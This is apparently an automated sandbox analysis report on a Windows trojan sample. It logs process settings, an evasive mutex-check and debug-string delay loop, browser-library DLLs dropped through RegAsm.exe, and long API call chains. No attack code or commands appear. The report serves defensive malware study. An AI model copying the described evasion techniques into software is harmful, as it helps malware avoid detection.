Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_3-4189

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: OutputDebugStringW count: 1937

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory allocated: 3000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory allocated: 51E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DC49 SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,GetLastError,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalAlloc,lstrlenA,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,	3_2_0040DC49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404B50 SetEnvironmentVariableA,CreateSemaphoreA,GetLastError,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateFileMappingW,FindFirstFileA,FindClose,CreateEventA,SetEvent,ResetEvent,CreateEventA,SetEvent,ResetEvent,LocalAlloc,GetLastError,LocalFree,LocalFree,LocalAlloc,LocalFree,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,CreateFileMappingW,CloseHandle,OutputDebugStringA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,CreateWaitableTimerA,CreateSemaphoreA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,FindCloseChangeNotification,CreateMutexA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,GetLastError,ReleaseMutex,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,CreateFileMappingW,FindCloseChangeNotification,CreateWaitableTimerA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,CreateFileMappingW,CreateFileMappingW,FindCloseChangeNotification,CreateFileMappingW,RegOpenKeyExA,CloseHandle,LocalAlloc,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateMutexA,ReleaseMutex,LocalAlloc,RegOpenKeyExA,LocalFree,CreateFileMappingW,RegOpenKeyExA,FindCloseChangeNotification,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSem	3_2_00404B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409ADC EntryPoint,LocalAlloc,LocalFree,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CoInitialize,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,SetEnvironmentVariableA,CancelWaitableTimer,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,ExitProcess,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,LocalAlloc,LocalFree,GetLastError,SetEnvironmentVariableA,CreateWaitableTimerA,GetLastError,GetLastError,OutputDebugStringA,CancelWaitableTimer,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,LocalAlloc,LocalFree,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,LocalAlloc,SetEnvironmentVariableA,LocalFree,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,GetLastError,FindCloseChangeNotification,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateFileMappingW,CloseHandle,CreateMutexA,ReleaseMutex,RegOpenKeyExA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,CreateMutexA,ReleaseMutex,LocalAlloc,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateEventA,SetEvent,ResetEvent,LocalAlloc,OutputDebugStringA,LocalFree,OutputDebugStringA,CreateFileMappingW,OutputDebugStringA,FindCloseChangeNotification,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,GetLastError,FindFirstFileA,FindClose,CreateWaitableTimerA,CreateWa	3_2_00409ADC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F4F1 CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateMutexA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateFileMappingW,CreateFileMappingW,CloseHandle,FindCloseChangeNotification,LocalAlloc,LocalFree,FindFirstFileA,LocalAlloc,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,OutputDebugStringA,CreateMutexA,ReleaseMutex,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,RegOpenKeyExA,RegOpenKeyExA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,RegQueryValueExW,RegQueryValueExW,	3_2_0040F4F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040ED79 lstrlenA,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,MultiByteToWideChar,CreateFileMappingW,GetLastError,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalFree,OutputDebugStringA,SetEnvironmentVariableA,	3_2_0040ED79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EB7B CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,SetEnvironmentVariableA,FindFirstFileA,FindClose,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalFree,	3_2_0040EB7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E48D OutputDebugStringA,CreateWaitableTimerA,CreateSemaphoreA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,LocalAlloc,LocalFree,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,CreateWaitableTimerA,LocalAlloc,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,GetLastError,FindFirstFileA,FindClose,SetEnvironmentVariableA,CreateFileMappingW,CloseHandle,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,LocalFree,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,CreateMutexA,RegOpenKeyExA,ReleaseMutex,SetEnvironmentVariableA,SHGetFolderPathW,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,StrCpyW,LocalFree,LocalFree,	3_2_0040E48D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F012 CancelWaitableTimer,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,CreateFileMappingW,FindCloseChangeNotification,LocalAlloc,GetLastError,GetLastError,LocalFree,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateEventA,SetEvent,ResetEvent,CreateMutexA,SetEnvironmentVariableA,SetEnvironmentVariableA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateMutexA,ReleaseMutex,RegOpenKeyExA,LocalAlloc,GlobalFree,	3_2_0040F012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004070C9 LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_004070C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040194A FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,	3_2_0040194A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409452 LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,PathCombineW,GetFileSize,LocalAlloc,ReadFile,lstrlenA,StrStrA,lstrlenA,StrStrA,LocalAlloc,FindFirstFileW,StrStrW,StrStrW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,StrStrW,StrCpyW,LocalAlloc,PathCombineW,PathCombineW,LocalFree,FindNextFileW,FindClose,LocalFree,CloseHandle,LocalFree,LocalFree,	3_2_00409452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410952 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_00410952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CA58 LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_0040CA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004105DE LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,	3_2_004105DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403BE6 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_00403BE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E179 CreateEventA,SetEvent,ResetEvent,CreateMutexA,RegOpenKeyExA,ReleaseMutex,GetLastError,RegOpenKeyExA,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,RegOpenKeyExA,LocalAlloc,OutputDebugStringA,LocalFree,SetEnvironmentVariableA,CreateFileMappingW,FindFirstFileW,	3_2_0040E179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004084FB LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_004084FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F788 LocalAlloc,GetLastError,GetLastError,LocalFree,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateFileMappingW,RegOpenKeyExA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,FindFirstFileA,FindClose,LocalAlloc,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,GetLastError,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateFileMappingW,GetLastError,CloseHandle,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,LocalFree,RegOpenKeyExA,GetLastError,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,StrCpyW,LocalFree,	